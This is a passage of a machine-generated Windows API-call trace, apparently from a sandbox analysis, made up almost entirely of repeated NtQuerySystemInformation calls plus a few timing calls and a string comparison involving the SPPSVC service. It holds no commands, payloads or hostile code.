[0272.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x20, ResultLength=0x0) [0272.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0272.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0272.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0272.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0272.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0272.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0272.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x28, ResultLength=0x0) [0272.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0272.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0272.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x20, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x20, ResultLength=0x0) [0272.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0272.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0272.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.414] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f8, Length=0x50, ResultLength=0x0) [0272.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x38, ResultLength=0x0) [0272.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0272.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x38, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0272.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0272.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x38, ResultLength=0x0) [0272.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0272.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0272.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0272.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0272.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x38, ResultLength=0x0) [0272.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0272.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0272.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0272.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc08, Length=0x50, ResultLength=0x0) [0272.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb80, Length=0x28, ResultLength=0x0) [0272.422] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc08, Length=0x50, ResultLength=0x0) [0272.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc08, Length=0x50, ResultLength=0x0) [0272.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0272.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.423] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0272.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0272.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0272.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x38, ResultLength=0x0) [0272.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0272.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0272.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0272.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8c0, Length=0x28, ResultLength=0x0) [0272.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x38, ResultLength=0x0) [0272.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc940, Length=0x28, ResultLength=0x0) [0272.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc940, Length=0x28, ResultLength=0x0) [0272.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x38, ResultLength=0x0) [0272.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8a0, Length=0x20, ResultLength=0x0) [0272.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x20, ResultLength=0x0) [0272.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x20, ResultLength=0x0) [0272.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x20, ResultLength=0x0) [0272.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x38, ResultLength=0x0) [0272.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8a0, Length=0x20, ResultLength=0x0) [0272.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x20, ResultLength=0x0) [0272.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x20, ResultLength=0x0) [0272.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.433] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfcb50 | out: lpSystemTimeAsFileTime=0xc751dfcb50*(dwLowDateTime=0x3a7a75e, dwHighDateTime=0x1d5fb6f)) [0272.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc08, Length=0x50, ResultLength=0x0) [0272.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb40, Length=0x28, ResultLength=0x0) [0272.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca58, Length=0x50, ResultLength=0x0) [0272.433] GetTickCount () returned 0x118469c [0272.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc928, Length=0x58, ResultLength=0x0) [0272.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0272.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0272.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0272.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0272.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0272.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x28, ResultLength=0x0) [0272.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0272.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0272.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0272.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0272.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x20, ResultLength=0x0) [0272.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0272.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0272.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0272.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0272.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x20, ResultLength=0x0) [0272.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0272.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.448] NtQuerySystemInformation 